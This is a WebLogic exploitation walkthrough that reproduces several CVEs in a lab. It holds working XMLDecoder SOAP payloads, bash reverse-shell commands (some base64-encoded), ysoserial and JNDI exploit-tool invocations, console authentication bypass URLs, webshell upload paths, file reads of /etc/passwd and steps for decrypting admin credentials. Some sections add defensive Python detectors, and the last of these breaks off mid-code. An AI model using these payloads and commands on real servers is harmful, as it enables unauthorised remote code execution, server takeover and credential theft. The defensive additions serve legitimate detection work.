0x01: Weblogic environment setup
Installation package: if you need a different version, download it directly from the official website:
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
Double click to open
Click Next
Set account password, Oracle@123
Go to the directory and double-click
Enter account password
Then access port 7001
Successfully built
0x02: WebLogic XMLDecoder Deserialization Vulnerability (CVE-2017-10271)
1. Vulnerability Principle
The CVE-2017-10271 vulnerability exists because the WebLogic WLS Security component exposes a web service that uses XMLDecoder to parse XML data supplied by the user. Deserialization during parsing allows arbitrary command execution, and an attacker can send carefully constructed XML data to obtain a reverse shell and thereby gain control of the server.
2. Affected version
10.3.6.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0
3. Vulnerability address
Default port: 7001
- /wls-wsat/CoordinatorPortType
- /wls-wsat/CoordinatorPortType11
- /wls-wsat/ParticipantPortType
- /wls-wsat/ParticipantPortType11
- /wls-wsat/RegistrationPortTypeRPC
- /wls-wsat/RegistrationPortTypeRPC11
- /wls-wsat/RegistrationRequesterPortType
- /wls-wsat/RegistrationRequesterPortType11
4. Vulnerability Recurrence
Version number: 10.3.6.0
Preliminary check: visit 192.168.88.133:7001/wls-wsat/CoordinatorPortType. If a page like the one in the image below appears, the target may be vulnerable.
A similar page appears when accessing any of the vulnerability paths listed above. We then use the following request to verify whether the vulnerability actually exists.
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.88.133:7001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ADMINCONSOLESESSION=llYJhP8TvzYxpGhV4LFc1l6QS7PpryrXbZkDy5H86nLSxspLvWhq!-2109495751
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 596

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java><java version="1.4.0" class="java.beans.XMLDecoder">
        <object class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
          <void method="println">
            <string>
              <![CDATA[ <% out.print("hello"); %> ]]>
            </string>
          </void>
          <void method="close"/>
        </object>
      </java></java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
The response status is 500.
Then access http://192.168.88.133:7001/bea_wls_internal/test.jsp
The file was written successfully, so the vulnerability exists.
Next, get a reverse shell. POST the following data:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>bash -i &gt;&amp; /dev/tcp/192.168.88.133/8888 0&gt;&amp;1</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
Start the listener.
The reverse shell comes back successfully.
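From the defender's side the request above is recognisable on the wire: a POST to one of the wls-wsat endpoints whose SOAP WorkContext header carries XMLDecoder markup. The following Python is an added example (it is not part of the original writeup and not Oracle code) that flags requests to the endpoints listed in section 3 and inspects the SOAP header for that pattern. The sample request bodies are constructed here after the shape of the page's own test payload, and SUSPICIOUS_CLASSES is an illustrative list assumed for the example, not WebLogic's blacklist.

```python
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
WORKAREA = "http://bea.com/2004/06/soap/workarea/"

# Endpoints of the wls-wsat component listed in the writeup (default port 7001).
WLS_WSAT_PATHS = {
    "/wls-wsat/CoordinatorPortType", "/wls-wsat/CoordinatorPortType11",
    "/wls-wsat/ParticipantPortType", "/wls-wsat/ParticipantPortType11",
    "/wls-wsat/RegistrationPortTypeRPC", "/wls-wsat/RegistrationPortTypeRPC11",
    "/wls-wsat/RegistrationRequesterPortType", "/wls-wsat/RegistrationRequesterPortType11",
}

# Classes a legitimate WorkContext header has no reason to name.
# Assumed illustrative list for this example, not an official deny-list.
SUSPICIOUS_CLASSES = {
    "java.beans.XMLDecoder", "java.lang.ProcessBuilder", "java.lang.Runtime",
    "java.io.PrintWriter", "java.io.FileOutputStream",
}


def is_wls_wsat_endpoint(path: str) -> bool:
    """True when the request path (query string ignored) is one of the wls-wsat endpoints."""
    return path.split("?", 1)[0].rstrip("/") in WLS_WSAT_PATHS


def inspect_soap_body(body: str) -> list:
    """Return sorted, de-duplicated findings for a SOAP body; [] means nothing suspicious.

    Only the SOAP Header is inspected: CVE-2017-10271 is triggered through the
    WorkContext header, not through the Body.
    """
    try:
        # ElementTree's expat parser does not fetch external entities, but it
        # still expands internal ones; use defusedxml for untrusted input in production.
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["unparseable-xml"]

    findings = []
    header = root.find(f"{{{SOAP_ENV}}}Header")
    if header is None:
        return findings
    for ctx in header.iter(f"{{{WORKAREA}}}WorkContext"):
        findings.append("workcontext-header")
        for el in ctx.iter():
            if el.tag == "java":                       # XMLDecoder's root element
                findings.append("xmldecoder-markup")
            cls = el.get("class")
            if cls in SUSPICIOUS_CLASSES:
                findings.append(f"class:{cls}")
            method = el.get("method")
            if el.tag == "void" and method in {"start", "exec", "println", "write"}:
                findings.append(f"method:{method}")
    return sorted(set(findings))


def classify_request(method: str, path: str, body: str) -> str:
    """'block' for a POST to a wls-wsat endpoint whose header carries XMLDecoder markup, else 'allow'."""
    if method.upper() != "POST" or not is_wls_wsat_endpoint(path):
        return "allow"
    findings = inspect_soap_body(body)
    if "unparseable-xml" in findings or any(f.startswith(("xmldecoder", "class:")) for f in findings):
        return "block"
    return "allow"


# Constructed sample modelled on the page's test payload (writes "hello" through PrintWriter).
SAMPLE_EXPLOIT_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java><java version="1.4.0" class="java.beans.XMLDecoder">
        <object class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/test.jsp</string>
          <void method="println"><string><![CDATA[ <% out.print("hello"); %> ]]></string></void>
          <void method="close"/>
        </object>
      </java></java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>"""

# Constructed benign SOAP request carrying an ordinary addressing header.
SAMPLE_BENIGN_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header><wsa:MessageID xmlns:wsa="http://www.w3.org/2005/08/addressing">urn:uuid:1</wsa:MessageID></soapenv:Header>
  <soapenv:Body><ping/></soapenv:Body>
</soapenv:Envelope>"""

if __name__ == "__main__":
    print(inspect_soap_body(SAMPLE_EXPLOIT_BODY))
    print(classify_request("POST", "/wls-wsat/CoordinatorPortType", SAMPLE_EXPLOIT_BODY))
```

The check deliberately keys on the header rather than on a specific class name so that a payload which swaps PrintWriter for another class is still caught by the `xmldecoder-markup` finding; the cleanest mitigation remains removing or access-restricting the wls-wsat component, as Oracle's patch does.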
0x03: Weblogic WLS Core Components deserialization command execution vulnerability (CVE-2018-2628)
1. Vulnerability Principle
In WebLogic, an attacker uses another RMI interface to bypass WebLogic's blacklist restrictions, and the loaded content is then parsed with readObject, resulting in a deserialization remote code execution vulnerability. The vulnerability is triggered through the T3 service: every WebLogic instance that exposes the console port 7001 enables the T3 service by default, and an attacker can obtain control of the target server by sending constructed T3 protocol data.
On the attacker's side, ysoserial acts as the listener. The reflection chain is integrated into ysoserial's CommonsCollections payload, and in the end it still relies on sun.reflect.annotation.AnnotationInvocationHandler. The payload generated on the attacker's side is sent to WebLogic; on deserialization WebLogic connects to the attacker's listener, the listener returns the malicious serialized data to WebLogic, and WebLogic deserializes it, completing the attack.
In resolveProxyClass in InboundMsgAbbrev, resolveProxyClass handles RMI interface types, but only java.rmi.registry.Registry is checked, so any other RMI interface bypasses the check. The core part is JRMP (Java Remote Method Protocol). In this PoC a RemoteObjectInvocationHandler is serialized; it uses a UnicastRef to establish a TCP connection to the remote end, obtains the RMI registry, loads the returned object, and parses it with readObject, so the remote code is deserialized and executed.
2. Affected version
weblogic 10.3.6.0, weblogic 12.1.3.0, weblogic 12.2.1.2, weblogic 12.2.1.3
3. Vulnerability Recurrence
First, use nmap to check whether the T3 protocol is enabled.
Use ysoserial to start a JRMP Server service
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections1 "touch /tmp/1.txt"
Use the cve-2018-2628.py script to send the packets to the target WebLogic. Here cve-2018-2628.py and ysoserial-0.0.6-SNAPSHOT-BETA-all.jar are placed in the same directory.
python CVE-2018-2628.py 192.168.88.133 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.88.133 9999 JRMPClient
The file was written successfully on the target machine.
Reverse shell:
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEzMy8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}"
Alternatively, use an automated tool to do it in one step: once the vulnerability is detected, get a shell.
The reverse shell comes back successfully.
0x04: Weblogic Unauthorized Access + Arbitrary File Upload Vulnerability (CVE-2018-2894)
1. Vulnerability Principle
Two unauthenticated pages on the WebLogic management side allow arbitrary JSP file upload, which leads to control of the server. Oracle fixed an arbitrary file upload vulnerability in the WebLogic Web Service Test Page. The Web Service Test Page is not enabled by default in production mode, so this vulnerability has certain limitations. The two pages are /ws_utc/begin.do and /ws_utc/config.do.
2. Affected version
weblogic 10.3.6.0, weblogic 12.1.3.0, weblogic 12.2.1.2, weblogic 12.2.1.3
3. Vulnerability Recurrence
Access the /ws_utc/config.do page without authentication.
Set the Work Home Dir to the static css directory of the ws_utc application, which can be accessed without any permission:
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
Then click Security -> Add on the left and upload the webshell:
The final file name is timestamp_filename.
Then visit http://192.168.88.133:7001/ws_utc/css/config/keystore/1628662540500_JspSpy.jsp to execute the webshell.
0x05: Weblogic Unauthorized Access + Remote Command Execution Vulnerability (CVE-2020-14882 &CVE-2020-14883)
1. CVE-2020-14883: Permission Bypass Vulnerability
A remote attacker can craft special HTTP requests to take over the WebLogic Server Console without authentication.
2. CVE-2020-14882: Code Execution Vulnerability
Combined with the CVE-2020-14883 vulnerability, a remote attacker can construct a special HTTP request to take over the WebLogic Server Console without authentication and execute arbitrary code in the WebLogic Server Console.
3. Affected version
Weblogic 10.3.6.0.0, Weblogic 12.1.3.0.0, Weblogic 12.2.1.3.0, Weblogic 12.2.1.4.0, Weblogic 14.1.1.0.0
4. Vulnerability Recurrence
We visit:
http://192.168.88.133:7001/console/images/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle("com.bea:Name=base_domain,Type=Domain")
Jump directly to the management console
At this point the permissions are very low and applications cannot be installed from the console, so it needs to be combined with the CVE-2020-14883 vulnerability. There are two ways to exploit this vulnerability:
- One is through com.tangosol.coherence.mvel2.sh.ShellSession
- The other is through com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
Use com.tangosol.coherence.mvel2.sh.ShellSession to execute commands:
http://192.168.88.133:7001/console/images/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch /tmp/fuck');");
File created successfully
This exploitation method only works on WebLogic 12.2.1 or above, because the com.tangosol.coherence.mvel2.sh.ShellSession class does not exist in version 10. When using the com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext class, you need to construct a malicious XML file:
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>/bin/bash</value>
        <value>-c</value>
        <value><![CDATA[bash -i >& /dev/tcp/192.168.88.133/1234 0>&1]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>
Then issue the following request through this class, allowing Weblogic to load this xml, execute the commands in it, and successfully bounce back to the shell.
http://192.168.88.133:7001/console/css/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.88.133:8888/1.xml")
0x06: Weblogic front-end arbitrary file read && weak password && backend getshell
1. Read any file
There are weak credentials in this environment:
- weblogic
- Oracle@123
Visit http://your-ip:7001/hello/file.jsp?path=/etc/passwd and you can see that the passwd file is read successfully.
Next we can read the backend user's password ciphertext and the key file. WebLogic passwords are encrypted with AES (3DES in old versions); since the encryption is symmetric, they can be decrypted as long as we find the user's ciphertext and the encryption key. These two files are located under base_domain and are named SerializedSystemIni.dat and config.xml. In this environment they are ./security/SerializedSystemIni.dat and ./config/config.xml (relative to the current directory /root/Oracle/Middleware/user_projects/domains/base_domain). SerializedSystemIni.dat is a binary file, so it must be read with Burp Suite; downloading it directly with a browser may introduce interfering characters. Select the garbled string read in Burp, right-click, and use "copy to file" to save it as a file:
config.xml is the global configuration file of base_domain, so it contains a lot of unrelated content. Find the encrypted value of the administrator password in it, and take care not to pick the wrong one:
Then use the decrypt tool provided in the lab environment to decrypt it.
2. Commonly used Weblogic weak passwords
- system:password
- weblogic:weblogic
- admin:security
- joe:password
- mary:password
- system:security
- wlcsystem:wlcsystem
- wlpisystem:wlpisystem
3. Upload war package GetShell in the background
3.1 war introduction
- A war is a web module that can be run directly. It is usually used for websites: it is packaged and deployed into a container, and once the war package is placed in the web directory it is extracted automatically, which is equivalent to publishing the site.
- Put simply, a war package is the packaged form of a JavaWeb program. It includes the class files compiled from the written code, the dependency packages, the configuration files, and all website pages, including html, jsp, and so on. A war package can be understood as a web project that contains everything the project needs.
3.2 war packaging
- Pack files into a war archive under Linux:
jar -cvf blog.war *
- View the contents of the war:
jar -tf blog.war
- You can also compress the files into a zip first and then change the suffix to war.
Click Deploy, then Upload File, upload the war package, click Next, and then Finish. Then connect with the Behinder (Ice Scorpion) webshell client to
http://192.168.88.133:7001/shell/shell.jsp
0x07: Weblogic IIOP protocol deserialization RCE (CVE-2020-2551)
1. Vulnerability Principle
The WebLogic IIOP protocol is enabled by default and listens on port 7001 together with the T3 protocol. The main cause of this vulnerability is incorrect filtering of the JtaTransactionManager class. Its parent class, AbstractPlatformTransactionManager, was added to the blacklist in an earlier patch. The T3 protocol filters through the resolveClass method, and since resolveClass also reads the parent class, T3 filtering is not affected by this. The IIOP protocol also uses the blacklist, but it does not check through resolveClass; by default it only checks the class's own name. JtaTransactionManager itself is not on the blacklist, and it is subject to JNDI injection.
2. Affected version
Use marshalsec to launch a malicious RMI service.
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.88.133:8888/#Exploit" 9999
Compile the EXP locally, then start a web server locally.
exp:
import java.io.IOException;

public class Exploit {
    static {
        try {
            java.lang.Runtime.getRuntime().exec(new String[]{"cmd", "/c", "calc"});
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
    }
}
compile
javac Exploit.java
Run jar package from command line
java -jar weblogic_CVE_2020_2551.jar 192.168.88.133 7001 rmi://192.168.88.133:1099/Exploit
Reproduction failed...
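Both CVE-2018-2628 (section 0x03) and CVE-2020-2551 (this section) come down to a deny-list that is consulted too narrowly: resolveProxyClass checks only java.rmi.registry.Registry among a proxy's interfaces, and the IIOP path compares only the incoming class's own name instead of walking up to its parent the way resolveClass does. The Python below is an added model of that difference, not WebLogic code and not part of the original writeup. The class and interface hierarchies are constructed for the example (package prefixes omitted, and example.RemoteThing is a hypothetical interface standing in for "any other RMI interface"), and the deny-list is reduced to the single entry the writeup mentions.

```python
# Constructed, simplified class hierarchy: class -> direct superclass.
# JtaTransactionManager extends AbstractPlatformTransactionManager, as the
# writeup states; package prefixes are omitted for readability.
SUPERCLASS = {
    "JtaTransactionManager": "AbstractPlatformTransactionManager",
    "AbstractPlatformTransactionManager": "java.lang.Object",
    "java.lang.String": "java.lang.Object",
    "java.lang.Object": None,
}

# Constructed interface hierarchy: interface -> set of super-interfaces.
# example.RemoteThing is hypothetical; it stands for "any other RMI interface".
SUPERINTERFACES = {
    "java.rmi.registry.Registry": {"java.rmi.Remote"},
    "example.RemoteThing": {"java.rmi.Remote"},
    "java.rmi.Remote": set(),
    "java.io.Serializable": set(),
}

# Deny-list reduced to the entry the writeup says the earlier patch added.
DENYLIST = {"AbstractPlatformTransactionManager"}


def name_only_filter(class_name: str) -> bool:
    """IIOP-style check as the writeup describes it: only the class's own name is compared.
    Returns True when the class would be accepted."""
    return class_name not in DENYLIST


def hierarchy_filter(class_name: str) -> bool:
    """resolveClass-style check: walk the superclass chain and reject if any ancestor is denied."""
    current = class_name
    while current is not None:
        if current in DENYLIST:
            return False
        current = SUPERCLASS.get(current)   # unknown class -> None, chain ends
    return True


def registry_only_proxy_filter(interfaces) -> bool:
    """resolveProxyClass as the writeup describes it: only java.rmi.registry.Registry is rejected."""
    return "java.rmi.registry.Registry" not in interfaces


def remote_aware_proxy_filter(interfaces) -> bool:
    """Hardened variant: reject a proxy if any interface is, or extends, java.rmi.Remote."""
    seen = set()
    stack = list(interfaces)
    while stack:
        iface = stack.pop()
        if iface in seen:
            continue
        seen.add(iface)
        if iface == "java.rmi.Remote":
            return False
        stack.extend(SUPERINTERFACES.get(iface, ()))
    return True


def compare_filters(class_name: str, interfaces) -> dict:
    """Side-by-side verdicts ('allow'/'reject') for the weak and the hierarchy-aware checks."""
    def verdict(ok: bool) -> str:
        return "allow" if ok else "reject"
    return {
        "class_name_only": verdict(name_only_filter(class_name)),
        "class_hierarchy": verdict(hierarchy_filter(class_name)),
        "proxy_registry_only": verdict(registry_only_proxy_filter(interfaces)),
        "proxy_remote_aware": verdict(remote_aware_proxy_filter(interfaces)),
    }


if __name__ == "__main__":
    # The same input passes the two narrow checks and fails the two hierarchy-aware ones.
    print(compare_filters("JtaTransactionManager", ["example.RemoteThing"]))
```

The point for anyone writing a deserialization filter (WebLogic's, a JEP 290 ObjectInputFilter, or a custom one) is that the decision must be taken on the resolved type and its whole ancestry, not on the name string that arrives on the wire.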
0x08: Weblogic remote code execution vulnerability (CVE-2021-2109)
Principle of vulnerability
This is a remote code execution vulnerability in WebLogic. It is mainly caused by JNDI injection, which allows an attacker to achieve remote code execution.
1. Affected version
10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
2. Vulnerability Recurrence
Reference link https://mp.weixin.qq.com/s/-ExbVwY7K3fY07h-KP4DEA
Docker is used here to build the environment
docker pull ismaleiva90/weblogic12
docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest
Visit http://your-ip:49163/console to see the page, User: weblogic Pass: welcome1
Start LDAP
java -jar JNDIExploit-v1.11.jar -i 192.168.88.133
Then send the packet
POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://192.168.88;133:1389/Basic/WeblogicEcho;AdminServer") HTTP/1.1
Host: 192.168.88.133:49163
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
cmd:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEzMy8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}
Connection: close
Referer: http://192.168.88.133:49163/console/console.portal?_nfpb=true&_pageLabel=HomePage1
Cookie: ADMINCONSOLESESSION=5ZY9z_8Wg654bjnM0Hmf8bqUjHKmT7Drs0qIkallCxuU154ML2u5!692946862
If-Modified-Since: Wed, 21 May 2014 19:34:20 GMT
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
bounce back to shell
2.1 Coordinating with unauthorized access
Combined with WebLogic unauthorized access, command execution via:
/console/css/../consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://192.168.88.133:1389/Basic/WeblogicEcho;AdminServer")
This POC can be used after logging in to the backend; if you are not authorized, use the one above:
/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer")
GET /console/css/%2e%2e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://192.168.88;133:1389/Basic/WeblogicEcho;AdminServer") HTTP/1.1
Host: 192.168.88.133:49163
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.88.133:49163/console/login/LoginForm.jsp
cmd:id
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
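The console-side issues in this writeup (the ws_utc test page in 0x04, the %2E%2E%2F path confusion and the handle parameter in 0x05, and the JndiBindingHandle carrying an ldap:// URL in this section) all show up in the request line, so they can be caught from access logs or at a reverse proxy in front of port 7001. The Python below is an added example, not code from the writeup or from Oracle: it percent-decodes and normalises the path, parses the handle parameter by hand (so the `;` inside the LDAP address is not mistaken for a query separator), and runs the checks over a few request lines constructed from the URLs on this page. The allow-list prefix com.bea.console.handles. and the static prefixes /console/images/ and /console/css/ are assumptions drawn from the page's own URLs.

```python
import posixpath
import re
from urllib.parse import unquote

# Console paths the writeup uses as the unauthenticated entry point (static resources).
STATIC_PREFIXES = ("/console/images/", "/console/css/")
# Handle classes the console is expected to instantiate (assumed allow-list prefix).
ALLOWED_HANDLE_PREFIX = "com.bea.console.handles."
# Web Service Test Page endpoints from section 0x04.
WS_UTC_PAGES = {"/ws_utc/begin.do", "/ws_utc/config.do"}

REQUEST_LINE = re.compile(r"^(\S+)\s+(.+?)\s+(HTTP/\d\.\d)$")
HANDLE_CLASS = re.compile(r"^\s*([A-Za-z_][\w$]*(?:\.[A-Za-z_][\w$]*)*)\s*\(")
URI_SCHEME = re.compile(r"\b(ldap|ldaps|rmi|iiop|http|https)://", re.IGNORECASE)


def decode_path(raw_path: str) -> str:
    """Percent-decode twice (catches double encoding) and collapse '..' segments."""
    return posixpath.normpath(unquote(unquote(raw_path)))


def split_query(query: str) -> list:
    """Split on '&' only. urllib's parse_qs historically also split on ';',
    which would cut the 'ldap://192.168.88;133' form in half."""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")      # first '=' only; values may contain '='
        pairs.append((unquote(name), unquote(value)))
    return pairs


def analyze_target(target: str) -> list:
    """Findings for one request target (path plus optional query string)."""
    findings = []
    raw_path, _, query = target.partition("?")
    decoded_raw = unquote(unquote(raw_path))
    normalized = decode_path(raw_path)

    # 0x05: request enters through a static prefix but resolves to a different console page.
    if decoded_raw.startswith(STATIC_PREFIXES) and not normalized.startswith(STATIC_PREFIXES):
        findings.append(f"console-path-confusion:{normalized}")

    # 0x04: test page reachable, or a JSP sitting in its keystore upload directory.
    if normalized in WS_UTC_PAGES:
        findings.append(f"ws_utc-test-page:{normalized}")
    if normalized.startswith("/ws_utc/css/config/keystore/") and normalized.endswith(".jsp"):
        findings.append("jsp-under-ws_utc-keystore")

    # 0x05 / 0x08: which class the handle parameter instantiates and what it points at.
    for name, value in split_query(query):
        if not name.lower().endswith("handle"):
            continue
        m = HANDLE_CLASS.match(value)
        if m and not m.group(1).startswith(ALLOWED_HANDLE_PREFIX):
            findings.append(f"handle-class-not-allowed:{m.group(1)}")
        s = URI_SCHEME.search(value)
        if s:
            findings.append(f"uri-in-handle:{s.group(1).lower()}")
    return findings


def analyze_request_line(line: str) -> list:
    """Parse 'METHOD target HTTP/x.y' and return its findings ([] when clean)."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return ["unparseable-request-line"]
    return analyze_target(m.group(2))


# Constructed request lines built from the URLs in this writeup, plus a benign one.
SAMPLE_LINES = [
    'GET /console/images/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle("com.bea:Name=base_domain,Type=Domain") HTTP/1.1',
    'GET /console/images/%2E%2E%2Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("x") HTTP/1.1',
    'POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle("ldap://192.168.88;133:1389/Basic/WeblogicEcho;AdminServer") HTTP/1.1',
    'GET /ws_utc/css/config/keystore/1628662540500_JspSpy.jsp HTTP/1.1',
    'GET /console/login/LoginForm.jsp HTTP/1.1',
]


def scan(lines) -> dict:
    """Map each suspicious request line to its findings; clean lines are omitted."""
    report = {}
    for line in lines:
        findings = analyze_request_line(line)
        if findings:
            report[line] = findings
    return report


if __name__ == "__main__":
    for line, findings in scan(SAMPLE_LINES).items():
        print(findings, "<-", line[:80])
```

Note that the first sample line is flagged even though its handle is a legitimate JMXHandle: the path confusion alone is the CVE-2020-14883 bypass, and the handle checks only add the second stage. Blocking the console from the network and applying Oracle's patch remain the actual fix; this is the detection layer you want while that is done.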
0x09: Weblogic T3 deserialization (CVE-2021-2394)
1. Vulnerability Recurrence
Here we borrow the environment of cve-2020-14882
The command is as follows:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/aaa.txt" -A 192.168.88.133
-C [command to execute]
-A [IP on which the LDAP service is opened]
Send the packet.
File created successfully
Reverse shell; remember to encode the command.
0x10: Several ways to write shell in weblogic
For deserialization vulnerabilities, if you already have system or root privileges there is no need to upload a trojan; but if you only have permission to install applications through the web, upload one to obtain greater privileges. Uploading requires finding a physical path, for example one of the following three:
1. Method 1: Write webshell in console images
\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp
http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp
2. Method 2: Write to the uddiexplorer directory
\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\random characters\war\shell.jsp
Visit http://*.*.*.*:7001/uddiexplorer/shell.jsp
3. Method 3: Write in the application installation directory
\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\project name\random characters\war\shell.jsp
Visit http://*.*.*.*:7001/project name/shell.jsp
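The three locations above are also exactly where an incident responder should look after a WebLogic compromise. The Python below is an added example (not the writeup's code) that walks a WebLogic directory tree and reports JSP files that are newer than a baseline inside the _WL_internal or _WL_user staging directories, that sit in a static-resource directory such as images, or whose source calls Runtime exec. The directory layout in demo() is constructed in a temporary folder after the three paths above (with Linux-style separators), and the markers it keys on are assumptions for this example rather than any official indicator.

```python
import os
import re
import tempfile
import time
from pathlib import Path

STAGING_MARKERS = {"_WL_internal", "_WL_user"}   # exploded-war staging dirs from the paths above
STATIC_DIR_NAMES = {"images", "css", "js"}        # no JSP should live beside static assets
EXEC_PATTERN = re.compile(r"Runtime\.getRuntime\(\)\.exec|ProcessBuilder")


def hunt_jsp(root: str, baseline_ts: float) -> list:
    """Return sorted (relative_path, 'reason1,reason2') tuples for suspicious JSP files under root."""
    root_path = Path(root)
    hits = []
    for jsp in root_path.rglob("*.jsp"):
        rel = jsp.relative_to(root_path)
        dirs = set(rel.parts[:-1])
        reasons = []
        if dirs & STATIC_DIR_NAMES:
            reasons.append("jsp-in-static-dir")
        if dirs & STAGING_MARKERS and jsp.stat().st_mtime > baseline_ts:
            reasons.append("jsp-newer-than-baseline-in-staging")
        try:
            if EXEC_PATTERN.search(jsp.read_text(errors="replace")):
                reasons.append("exec-call-in-jsp")
        except OSError:
            reasons.append("unreadable")
        if reasons:
            hits.append((rel.as_posix(), ",".join(sorted(reasons))))
    return sorted(hits)


def _write(path: Path, text: str, mtime=None) -> None:
    """Create a file (and its parents); optionally back-date its mtime."""
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(text)
    if mtime is not None:
        os.utime(path, (mtime, mtime))


def demo() -> list:
    """Build a constructed tree mirroring the three paths above and hunt through it."""
    now = time.time()
    baseline = now - 3600          # e.g. the time of the last legitimate deployment
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        # Method 1 location: console images directory (static) holding a JSP.
        _write(base / "wlserver_10.3/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/shell.jsp",
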